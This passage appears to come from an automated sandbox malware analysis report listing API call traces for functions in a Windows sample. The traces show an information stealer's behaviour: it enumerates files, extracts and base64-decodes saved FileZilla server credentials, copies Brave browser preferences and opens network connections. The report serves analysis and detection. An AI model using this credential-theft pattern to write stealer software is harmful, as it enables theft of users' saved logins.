                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C2181
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: a7cccdb5cd8e305374d980737843ad7c10831509e41ac2d063f62755bca26478
                                • Instruction ID: edfe5ce4d00fadc5243cbc403b5c9da7ddd399c7a411d76748f9556eee19a71a
                                • Opcode Fuzzy Hash: a7cccdb5cd8e305374d980737843ad7c10831509e41ac2d063f62755bca26478
                                • Instruction Fuzzy Hash: CB627030911656ABDB22EF64CE88FAE77BDEF85711F050128B805A7252DF34DD05CBA2
                                Function 009C3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 009C392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 009C3943
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009C396C
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009C3986
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C39BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C39E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C39F2
                                • lstrlen.KERNEL32(009E1794), ref: 009C39FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3A1A
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3A26
                                • lstrlen.KERNEL32(?), ref: 009C3A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3A53
                                • lstrcat.KERNEL32(00000000,?), ref: 009C3A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3A8A
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C3ACE
                                • lstrlen.KERNEL32(?), ref: 009C3AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B36
                                • lstrlen.KERNEL32(009E1794), ref: 009C3B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B6A
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B9E
                                • lstrlen.KERNEL32(?), ref: 009C3BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 009C3BE0
                                • lstrlen.KERNEL32(010C88C8), ref: 009C3C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3C3C
                                • lstrlen.KERNEL32(010C8958), ref: 009C3C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3CB7
                                • lstrlen.KERNEL32(009E1794), ref: 009C3CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3CE8
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C3D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3D79
                                • lstrlen.KERNEL32(009E1794), ref: 009C3D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3DAD
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3E43
                                • lstrlen.KERNEL32(009E1794), ref: 009C3E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3E77
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3F0D
                                • lstrlen.KERNEL32(009E1794), ref: 009C3F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3F41
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3F75
                                • lstrlen.KERNEL32(?), ref: 009C3F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 009C3FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3FE0
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C401F
                                • lstrlen.KERNEL32(010CD280), ref: 009C402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C4061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C40CE
                                • lstrcat.KERNEL32(00000000), ref: 009C40DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009C42D9
                                • FindClose.KERNEL32(00000000), ref: 009C42E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: b9a8429a57b01dd32a5e73877c09598e292e316a638881d0b92054484e93319b
                                • Instruction ID: 03afabfc1b3b9d88ad2fb0c197aab9584b9745d2ff97ff2781acdd1a0395bbed
                                • Opcode Fuzzy Hash: b9a8429a57b01dd32a5e73877c09598e292e316a638881d0b92054484e93319b
                                • Instruction Fuzzy Hash: 81627D31D11616ABDB21EFA4DE89FEE77B9EF84700F048128B805A7251DB34DE05CB92
                                Function 009C6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009C69C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C6A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 009C6A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 009C6AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 009C6B35
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6B9D
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 7edc1e033a76f40bfbd4a1b70c28d319a09a2f06c5b83a6d914e1964c9592092
                                • Instruction ID: 799dcf842686517952b75633340acb97943e7033b9c1b8b054f443b66ede7890
                                • Opcode Fuzzy Hash: 7edc1e033a76f40bfbd4a1b70c28d319a09a2f06c5b83a6d914e1964c9592092
                                • Instruction Fuzzy Hash: 02427E71E01246ABDB21ABB4DE89FAE7BB9AF84710F144418F506EB281DF34DD058B61
                                Function 009BDB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDBEF
                                • lstrlen.KERNEL32(009E4CA8), ref: 009BDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDC17
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009BDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDC4C
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDC8F
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009BDCD0
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009BDCF0
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009BDD0A
                                • lstrlen.KERNEL32(009DCFEC), ref: 009BDD1D
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDD7B
                                • lstrlen.KERNEL32(009E1794), ref: 009BDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDDA3
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDDAF
                                • lstrlen.KERNEL32(?), ref: 009BDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 009BDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDE19
                                • lstrlen.KERNEL32(009E1794), ref: 009BDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BDE6F
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDE7B
                                • lstrlen.KERNEL32(010C8B78), ref: 009BDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDEBB
                                • lstrlen.KERNEL32(009E1794), ref: 009BDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BDEE6
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDEF2
                                • lstrlen.KERNEL32(010C8998), ref: 009BDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDFA5
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDFB1
                                • lstrlen.KERNEL32(010C8B78), ref: 009BDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDFF4
                                • lstrlen.KERNEL32(009E1794), ref: 009BDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE022
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BE02E
                                • lstrlen.KERNEL32(010C8998), ref: 009BE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 009BE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 009BE0E7
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BE11F
                                • lstrlen.KERNEL32(010CD280), ref: 009BE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE155
                                • lstrcat.KERNEL32(00000000,?), ref: 009BE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE19F
                                • lstrcat.KERNEL32(00000000), ref: 009BE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 009BE1F9
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BE22F
                                • lstrlen.KERNEL32(010C88C8), ref: 009BE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE261
                                • lstrcat.KERNEL32(00000000,010C88C8), ref: 009BE269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009BE988
                                • FindClose.KERNEL32(00000000), ref: 009BE997
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: b6c0b8e94a8174d99c8635cd320ca06db51d1b938d0e6f8aadbb5c66f6b9d11f
                                • Instruction ID: d107c8c3ca1f42a3f24a194e86b4ecad698d033c7ae171cfe52927fcff268a87
                                • Opcode Fuzzy Hash: b6c0b8e94a8174d99c8635cd320ca06db51d1b938d0e6f8aadbb5c66f6b9d11f
                                • Instruction Fuzzy Hash: E0526E709116469BDB21EFA4DE89AEE77BDEF84320F144428F84AAB251DF34DC45CB90
                                Function 009B60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B60FF
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B6152
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B6185
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B61B5
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B61F0
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B6223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009B6233
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 50563580b115eeeddfc6a070d4f6b6abb0a8889ce45c211904e00f2a1ddf4815
                                • Instruction ID: 0cf0fd9dd45246af085df55009489192767a1eb82f7483521e538931ec8b5b47
                                • Opcode Fuzzy Hash: 50563580b115eeeddfc6a070d4f6b6abb0a8889ce45c211904e00f2a1ddf4815
                                • Instruction Fuzzy Hash: 9B525F719106569BDB21EFA4DE89BEEB7B9EF84320F158424F805EB251DB34EC05CB90
                                Function 009C6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6B9D
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6BCD
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6BFD
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 009C6C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009C6C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 009C6C5A
                                • lstrlen.KERNEL32(00000000), ref: 009C6C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 009C6CE2
                                • lstrlen.KERNEL32(00000000), ref: 009C6CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 009C6D6A
                                • lstrlen.KERNEL32(00000000), ref: 009C6D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009C6DF2
                                • lstrlen.KERNEL32(00000000), ref: 009C6E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009C6E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 009C6EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 009C6EC9
                                • LocalFree.KERNEL32(00000000), ref: 009C6ED4
                                • lstrlen.KERNEL32(?), ref: 009C6F6E
                                • lstrlen.KERNEL32(?), ref: 009C6F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: 8d6628d6797bf12a896e93a3f2c5e3d3d3dbf186e5dfea23cfe1139464f680c4
                                • Instruction ID: 6776a9b462b55de107726775e07254eb72144174bdf680ef06d5fbe65e745676
                                • Opcode Fuzzy Hash: 8d6628d6797bf12a896e93a3f2c5e3d3d3dbf186e5dfea23cfe1139464f680c4
                                • Instruction Fuzzy Hash: 11027E70A11246ABDB11EBB4DE89F9E7BB9EF84714F144418F906EB281DF34DD018BA1
                                Function 009C4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                Download Yara Rule
                                APIs
